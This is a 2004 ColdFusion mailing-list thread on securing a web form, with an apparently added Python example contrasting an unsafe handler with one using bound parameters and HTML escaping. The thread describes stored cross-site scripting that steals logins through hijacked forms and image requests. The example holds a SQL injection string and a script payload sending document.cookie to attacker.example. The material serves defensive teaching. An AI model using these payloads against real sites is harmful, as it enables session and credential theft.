Matt, which bit of code is it?? Can't find it!

Matt Horn wrote:

the solution is simple

strip out javascript and HTML from form posts
by replacing < and > with &gt; and &lt; and the word 'javascript' with  java
script or something

that way if code is posted it will be rendered ineffective

cflib has a bit of code to do just that AFAIK

HTH

Matt



----- Original Message ----- From: "Russ Michaels (Snake)" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Wednesday, September 08, 2004 10:10 AM
Subject: RE: [ cf-dev ] Tips on securing a form.





Yes, because the javascript you're putting in the form is being saved in the
database and displayed on another page. You're not altering the original
page.

This allows you to gain access to pages and data that only the person logged
into the site should be able to see.

Russ



-----Original Message-----
From: Mark Smyth [mailto:[EMAIL PROTECTED]
Sent: 07 September 2004 17:24
To: '[EMAIL PROTECTED]'
Subject: RE: [ cf-dev ] Tips on securing a form.

Hi Russ

I'm a bit confused. Is entering the javascript into form fields and then
altering the HTML any different than viewing the source of a form, saving a
local copy and then altering the HTML and posting it?

Thanks
Mark

-----Original Message-----
From: Russ Michaels (Snake) [mailto:[EMAIL PROTECTED]
Sent: 07 September 2004 17:03
To: [EMAIL PROTECTED]
Subject: RE: [ cf-dev ] Tips on securing a form.


Well, you make sure that SQL cannot be inserted by using CFQUERYPARAM around your values, so any altering of form fields or URLs won't allow code execution. There isn't much you can do about general text fields, as these are intended for people to type text into. But as long as you stop code execution, then nothing they put there will do any damage. You may want to do validation to stop any TAGS being typed into the fields, and stop arbitrary code from calling individual pages on your site, otherwise people can then use javascript and the like to get at people's data.

An example of this. Let's say you have a site where you can view people's profiles or comments, such as a forum for instance. In my post or comment or profile I could put some javascript that popped up a new window and loaded the personal settings page into that window (which would load that person's settings because they are logged in). Now because my code is on the calling page that popped up that window, I can now manipulate anything in that window, which means I can alter the form action to submit any form to a URL on my server instead and thus grab any of that person's info, such as username/password etc., when they click save. Or I can just grab anything that is on that page initially and use an IMG tag to send all the values as attributes to a .cfm page on my server. Or indeed I can pop up any old page from my own server that tells that person they have logged out and to log back in; bam, I have their login details.

Now apply this example to sites that take orders, store credit details, private information about people, and you can see how easy it is to steal people's databases without the correct code in place to stop it. I can tell you for a start that I discovered you can do this sort of thing with the Worldpay payment gateway unless you implement code to avoid it.

I hope I haven't given you lot any ideas now :-)

Russ Michaels
Macromedia/Allaire Certified ColdFusion Developer

CFDeveloper
The free resource and community for ColdFusion developers.
http://www.cfdeveloper.co.uk

Join the CFDeveloper discussion lists.
To subscribe send an e-mail to [EMAIL PROTECTED]
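The two controls Russ describes above (CFQUERYPARAM so that posted values can never become SQL, and stopping posted tags from running when the stored text is displayed), together with the encode-the-angle-brackets approach Matt suggests further up the thread, as an added example that is not part of the original thread. It is Python against an in-memory SQLite table rather than ColdFusion so that it runs stand-alone: driver parameter binding plays the role of CFQUERYPARAM and html.escape plays the role of HTMLEditFormat. The comments table, the two hostile form posts, and the attacker.example hostname are all constructed for the demonstration.

```python
"""Comment form handler shown twice: the unsafe 'submit straight to an
INSERT query' version, then a hardened version that binds parameters on
the way in and HTML-encodes on the way out.

Constructed example: in-memory SQLite, made-up table and inputs."""
import html
import re
import sqlite3


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE comments (id INTEGER PRIMARY KEY, author TEXT, body TEXT)"
    )
    return conn


# --- Unsafe: field values spliced into the SQL text, echoed back raw ---

def unsafe_insert(conn, author, body):
    # A quote inside a field ends the literal; everything after it is SQL.
    sql = "INSERT INTO comments (author, body) VALUES ('%s', '%s')" % (author, body)
    conn.execute(sql)
    conn.commit()


def unsafe_render(conn):
    rows = conn.execute("SELECT author, body FROM comments ORDER BY id").fetchall()
    # Stored text lands in the page unchanged, so any tag a poster stored
    # runs in every later visitor's browser (stored cross-site scripting).
    return "".join("<p><b>%s</b>: %s</p>" % (a, b) for a, b in rows)


# --- Hardened: bind parameters going in, encode coming out ---

def safe_insert(conn, author, body):
    # Values travel separately from the statement text, so quotes are data,
    # never syntax. This is what CFQUERYPARAM does in a CFQUERY.
    conn.execute("INSERT INTO comments (author, body) VALUES (?, ?)", (author, body))
    conn.commit()


def safe_render(conn):
    rows = conn.execute("SELECT author, body FROM comments ORDER BY id").fetchall()
    # html.escape turns < > & " ' into entities (ColdFusion: HTMLEditFormat),
    # so the browser displays the text instead of interpreting it.
    return "".join(
        "<p><b>%s</b>: %s</p>" % (html.escape(a, quote=True), html.escape(b, quote=True))
        for a, b in rows
    )


TAG_RE = re.compile(r"<[^>]*>")


def contains_markup(value):
    """Input-side check for rejecting fields that carry tags at all: a second
    line of defence. Output encoding is still the control that stops the
    script running, because it does not depend on guessing every payload."""
    return TAG_RE.search(value) is not None


# Constructed hostile form posts (not real traffic).
SQLI_BODY = "x'), ('admin', 'pwned"   # closes the literal and smuggles a 2nd row
XSS_BODY = (
    '<script>new Image().src="http://attacker.example/grab.cfm?c="'
    "+document.cookie</script>"
)


def demo_sqli():
    """Post SQLI_BODY through both handlers; return (unsafe rows, safe rows)."""
    u, s = make_db(), make_db()
    unsafe_insert(u, "eve", SQLI_BODY)
    safe_insert(s, "eve", SQLI_BODY)
    q = "SELECT author, body FROM comments ORDER BY id"
    return u.execute(q).fetchall(), s.execute(q).fetchall()


def demo_xss():
    """Post XSS_BODY through both handlers; return (unsafe page, safe page)."""
    u, s = make_db(), make_db()
    unsafe_insert(u, "eve", XSS_BODY)
    safe_insert(s, "eve", XSS_BODY)
    return unsafe_render(u), safe_render(s)


if __name__ == "__main__":
    unsafe_rows, safe_rows = demo_sqli()
    print("unsafe insert stored:", unsafe_rows)   # an extra 'admin' row appears
    print("safe insert stored:  ", safe_rows)     # the payload is just text
    unsafe_page, safe_page = demo_xss()
    print("unsafe page:", unsafe_page)            # live <script> tag
    print("safe page:  ", safe_page)              # &lt;script&gt; shown as text
```

The unsafe path shows both failures the thread is about: the SQL payload turns one posted comment into two rows, one of them attributed to "admin", and the stored script tag is emitted live into the page for every reader. The hardened path stores the same strings verbatim but as inert data, and the rendered output still contains the word "javascript" or any other blacklisted token without harm, which is why encoding on output is preferable to rewriting words on input.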




-----Original Message-----
From: Stephen Adams [mailto:[EMAIL PROTECTED]
Sent: 07 September 2004 16:33
To: 'Dev
Subject: [ cf-dev ] Tips on securing a form.

Hi,

I have a simple form, which mainly uses drop down list, but
there are a couple of textareas and textfields. Can anyone
tell me where I can find tutorial/tips on how to
programmatically secure this form.

At the moment my form submits straight to an INSERT query; I
just want to make sure no one can attack the site through this form.





-- These lists are syncronised with the CFDeveloper forum at http://forum.cfdeveloper.co.uk/ Archive: http://www.mail-archive.com/dev%40lists.cfdeveloper.co.uk/

CFDeveloper Sponsors and contributors:-
*Hosting and support provided by CFMXhosting.co.uk* ::
*ActivePDF provided
by activepdf.com*
     *Forums provided by fusetalk.com* :: *ProWorkFlow provided by
proworkflow.com*
          *Tutorials provided by helmguru.com* :: *Lists hosted by
gradwell.com*

To unsubscribe, e-mail: [EMAIL PROTECTED]


